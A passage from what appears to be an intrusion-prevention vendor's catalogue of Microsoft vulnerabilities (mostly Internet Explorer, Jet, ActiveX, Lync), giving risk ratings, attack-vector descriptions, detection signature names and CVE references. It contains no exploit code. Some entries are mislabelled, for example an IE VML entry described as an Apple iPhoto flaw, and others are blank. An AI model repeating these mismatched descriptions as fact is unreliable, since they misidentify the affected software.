Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
File-Text_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036

References:

CVE-2011-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0036

BID-46158
http://www.securityfocus.com/bid/46158

OSVDB-70832
http://www.osvdb.org/70832

MS11-003
http://technet.microsoft.com/security/bulletin/MS11-003

Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer web browser. The vulnerability is due to an error while accessing an object that has been already deleted or not initialized. This would result in accessing arbitrary memory content and can be exploited for code execution. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. The behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Uninitialized-Object-Memory-Corruption-2

References:

CVE-2010-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0490

BID-39031
http://www.securityfocus.com/bid/39031

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

About this vulnerability:

A security bypass vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-287-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a security bypass vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
HTTP_SHS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
File-Text_Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

References:

CVE-2010-0255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0255

BID-38055
http://www.securityfocus.com/bid/38055

OSVDB-62156
http://www.osvdb.org/62156

MS10-035
http://technet.microsoft.com/security/bulletin/MS10-035

Microsoft-Internet-Explorer-Url-Validation

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-281-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Url-Validation
File-Text_Microsoft-Internet-Explorer-Url-Validation

References:

CVE-2010-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0027

BID-37884
http://www.securityfocus.com/bid/37884

MS10-007
http://technet.microsoft.com/security/bulletin/MS10-007

Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation

About this vulnerability:

A vulnerability in Internet Explorer allows detection evasion

Risk:

High

First detected in:

sgpkg-ips-125-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

There is an input validation vulnerability in Microsoft Internet Explorer. While rendering HTML pages, Internet Explorer ignores the most significant bit from 8-bit US-ASCII characters, allowing evasion of detection devices.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
File-Text_Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation

References:

CVE-2006-3227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3227

OSVDB-28376
http://www.osvdb.org/28376

Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-354-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2

References:

CVE-2010-3962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3962

BID-44536
http://www.securityfocus.com/bid/44536

OSVDB-68987
http://www.osvdb.org/68987

MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090

Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2012-0170

References:

CVE-2012-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0170

BID-52904
http://www.securityfocus.com/bid/52904

MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023

Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A vulnerability has been reported in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776-2
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2014-1776

References:

CVE-2014-1776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1776

BID-67075
http://www.securityfocus.com/bid/67075

OSVDB-106311
http://www.osvdb.org/106311

MS14-021
http://technet.microsoft.com/security/bulletin/MS14-021

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0955

References:

CVE-2018-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0955

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0990

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991

References:

CVE-2018-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0990

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

There has been reported a use-after-free vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0991

References:

CVE-2018-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0991

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-0994

References:

CVE-2018-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0994

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1004

References:

CVE-2018-1004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1004

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018

References:

CVE-2018-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1018

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1084-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275

References:

CVE-2018-8275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8275

ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul

Microsoft-Internet-Explorer-VBScript-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects by the VBScript engine. A remote attacker can exploit this vulnerability by enticing user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-VBScript-Memory-Corruption

References:

CVE-2014-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0271

BID-65395
http://www.securityfocus.com/bid/65395

OSVDB-103166
http://www.osvdb.org/103166

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows Vista; Windows 2003

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Vector Markup Language (VML) implementation in Microsoft Windows. The vulnerability is caused due to an integer underflow in the VML implementation (vgx.dll) when receiving compressed HTTP response. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious webpage, to cause a heap-based buffer overflow and possibly inject and execute arbitrary code on the target system with the privileges of the currently logged in user. In an attack case where code injection is not successful, the affected application using the vulnerable vgx.dll will terminate abnormally. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-Binary_Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow

References:

CVE-2007-1749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1749

BID-25310
http://www.securityfocus.com/bid/25310

MS07-050
http://technet.microsoft.com/security/bulletin/MS07-050

Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Internet Explorer (IE). The vulnerability is due to the way in which IE accesses a corrupted virtual function table. A remote attacker could exploit this vulnerability by enticing a target user to view a specially crafted webpage. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption

References:

CVE-2011-2001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2001

BID-49966
http://www.securityfocus.com/bid/49966

OSVDB-76213
http://www.osvdb.org/76213

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Microsoft-Internet-Explorer-VML-Buffer-Overrun

About this vulnerability:

A format string vulnerability in Apple iPhoto

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP; Windows XP 64-bit; Windows 2003; Windows 2003 64-bit

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0

Type:

Buffer Overflow

Description:

There is a buffer overrun vulnerability in Microsoft Internet Explorer. A crafted Vector Markup Language (VML) formatted file may be used to execute code in the privilege of the current user.

Situation:

HTTP_Microsoft-Internet-Explorer-VML-Buffer-Overrun
File-Text_Microsoft-Internet-Explorer-VML-Buffer-Overrun

References:

CVE-2007-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0024

BID-21930
http://www.securityfocus.com/bid/21930

OSVDB-31250
http://www.osvdb.org/31250

MS07-004
http://technet.microsoft.com/security/bulletin/MS07-004

Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft PowerPoint.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
File-Text_Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266

References:

CVE-2011-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1266

MS11-052
http://technet.microsoft.com/security/bulletin/MS11-052

Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 6.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172

References:

CVE-2012-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0172

MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023

Microsoft-Internet-Explorer-VML-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the access of previously deleted objects. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. If code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In this case the injected code would be executed within the security context of the currently logged-in user. If code execution fails the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-VML-Use-After-Free

References:

CVE-2012-0155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0155

BID-51935
http://www.securityfocus.com/bid/51935

OSVDB-79268
http://www.osvdb.org/79268

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method

About this vulnerability:

A buffer overflow vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-195-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Internet Explorer. There is no sufficient validation of parameters delivered to a specific ActiveX control. This leads to memory corruption. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially-crafted web page. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
File-Text_Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method

References:

CVE-2008-4258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4258

BID-32596
http://www.securityfocus.com/bid/32596

MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073

Microsoft-Internet-Explorer-XMLDOM-Information-Disclosure

About this vulnerability:

A Microsoft Internet Explorer XMLDOM Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-741-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer, versions 8.0 through 9.0, which allows remote attackers to enumerate remote machine's information, including local pathnames, intranet hostnames, intranet IP addresses, and other information.

Situation:

File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control

References:

CVE-2013-7331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7331

Microsoft-Internet-Explorer-XSLT-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way in which Internet Explorer processes an iframe that points to an XSL document. This can result in access to an object that is not initialized or has already been deleted. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.

Situation:

File-Text_Microsoft-Internet-Explorer-XSLT-Memory-Corruption

References:

CVE-2011-1963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1963

BID-49037
http://www.securityfocus.com/bid/49037

OSVDB-74499
http://www.osvdb.org/74499

MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057

Microsoft-Java-VM-Bytecode-Verifier-Bypass

About this vulnerability:

A vulnerability in Microsoft Java VM

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows 98; Windows ME; Windows NT 4.0; Windows 2000; Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in the Java ByteCode Verifier implementation in Microsoft's Java Virtual Machine. The vulnerability allows arbitary code execution in the context of the current user.

Situation:

HTTP_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR
File-Zip_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR

References:

CVE-2003-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0111

MS03-011
http://technet.microsoft.com/security/bulletin/MS03-011

Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1012-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper handling of in-memory objects causes a buffer overflow vulnerability in Microsoft Jet Database Engine. A successful exploit allows arbitrary code to be executed on the target system.

Situation:

File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow

References:

CVE-2017-8717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8717

Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1017-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability in the Microsoft Jet Database engine.

Situation:

File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow

References:

CVE-2017-8718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8718

Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper handling of objects in memory. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted Excel file while using an affected version of Microsoft Windows. Successful exploitation results in arbitrary code execution under the context of the user.

Situation:

File-OLE_Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow

References:

CVE-2018-8392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8392

Microsoft-Jet-Db-Engine-Buffer-Overflow

About this vulnerability:

Vulnerability in Microsoft Jet database engine

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Jet Database Engine

Type:

Buffer Overflow

Description:

There is a vulnerability in Microsoft Jet database engine. Opening a crafted mdb file with an application that utilizes a vulnerable version of Jet engine, typically a Microsoft Access product, may lead to arbitrary code execution.

Situation:

E-Mail_BS-Microsoft-Jet-Db-Engine-Buffer-Overflow
HTTP_Microsoft-Jet-Db-Engine-Buffer-Overflow
File-Binary_Microsoft-Jet-Db-Engine-Buffer-Overflow

References:

CVE-2005-0944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944

BID-12960
http://www.securityfocus.com/bid/12960

OSVDB-15187
http://www.osvdb.org/15187

Microsoft-JScript-Scripting-Engine-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-242-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP2; Windows XP 64-bit SP2; Windows 2003; Windows 2008; Windows Vista SP1

Software:

<os>

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Windows JScript Scripting Engine.

Situation:

HTTP_SS-Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
File-Text_Microsoft-JScript-Scripting-Engine-Remote-Code-Execution

References:

CVE-2009-1920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1920

MS09-045
http://technet.microsoft.com/security/bulletin/MS09-045

Microsoft-Killbit-Disabled-ActiveX-Object

About this vulnerability:	Disabled ActiveX object
Risk:	High
First detected in:	sgpkg-ips-248-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Buffer Overflow
Description:	There is a multiple vulnerabilities in various ActiveX components. Microsoft disables these vulnerable objects within their patch releases.
Situation:	HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

Microsoft-Killbit-Disables-ActiveX-Object-CVE-2009-2493

About this vulnerability:

ActiveX controls disabled with killbits

Risk:

High

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There are multiple vulnerabilities in various ActiveX components. Microsoft disabled these vulnerable objects with a patch for MS09-055.

Situation:

HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

References:

CVE-2009-2493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2493

MS09-055
http://technet.microsoft.com/security/bulletin/MS09-055

Microsoft-Killbit-Disables-ActiveX-Object-CVE-2013-3918

About this vulnerability:

ActiveX controls disabled with killbits

Risk:

High

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012

Software:

<os>

Type:

Malfunction

Description:

There are multiple vulnerabilities in various ActiveX components. Microsoft disabled these vulnerable objects with a patch for MS13-090.

Situation:

File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

References:

CVE-2013-3918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3918

BID-63631
http://www.securityfocus.com/bid/63631

OSVDB-99555
http://www.osvdb.org/99555

MS13-090
http://technet.microsoft.com/security/bulletin/MS13-090

Microsoft-License-Logging-Server-RPC-Call-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability has been reported in Microsoft License Logging Server. The vulnerability is due to a boundary error while handling RPC calls by the License Logging service. Remote attackers could exploit this vulnerability by sending a specially crafted RPC request to an affected system. Successful exploitation would result in execution of arbitrary code on the vulnerable system with SYSTEM privileges. The behaviour of the target is dependent on the intention of the malicious code. An unsuccessful exploit attempt may abnormally terminate the affected process.

Situation:

MSRPC-TCP_CPS-Vulnerable-Microsoft-License-Logging-Server-Function-Called

References:

CVE-2009-2523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523

BID-36921
http://www.securityfocus.com/bid/36921

MS09-064
http://technet.microsoft.com/security/bulletin/MS09-064

Microsoft-Lync-Information-Disclosure-CVE-2014-1923

About this vulnerability:

A vulnerability in Microsoft Lync Server

Risk:

High

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Lync Server 2010; Microsoft Lync Server 2013

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Lync Server.

Situation:

HTTP_CSU-Microsoft-Lync-Information-Disclosure-CVE-2014-1923

References:

CVE-2014-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1923

MS14-032
http://technet.microsoft.com/security/bulletin/MS14-032

Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849

About this vulnerability:

A vulnerability in Microsoft Lync

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Lync

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Lync.

Situation:

HTTP_SLS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
SMB-TCP_CHS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849

References:

CVE-2012-1849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1849

OSVDB-82852
http://www.osvdb.org/82852

MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039

Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038

About this vulnerability:

A remote code execution vulnerability in AVI media handling

Risk:

High

First detected in:

sgpkg-ips-239-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in the way Microsoft Windows handles AVI format files. A malicously formatted AVI file could trigger a vulnerability in Windows that allows remote code execution.

Situation:

HTTP_SS-AVI-MS09-038
File-RIFF_Microsoft-Windows-AVI-MS09-038
File-RIFF_Microsoft-Windows-AVI-MS09-038-2

References:

CVE-2009-1545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1545

BID-35967
http://www.securityfocus.com/bid/35967

MS09-038
http://technet.microsoft.com/security/bulletin/MS09-038

Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Antigen for Exchange

Risk:

High

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Antigen; Microsoft Forefront Client Security; Microsoft Forefront Security for Exchange Server; Microsoft Forefront Security for SharePoint; Microsoft Standalone System Sweeper; Microsoft Windows Defender; Microsoft Windows Live OneCare

Type:

Input Validation

Description:

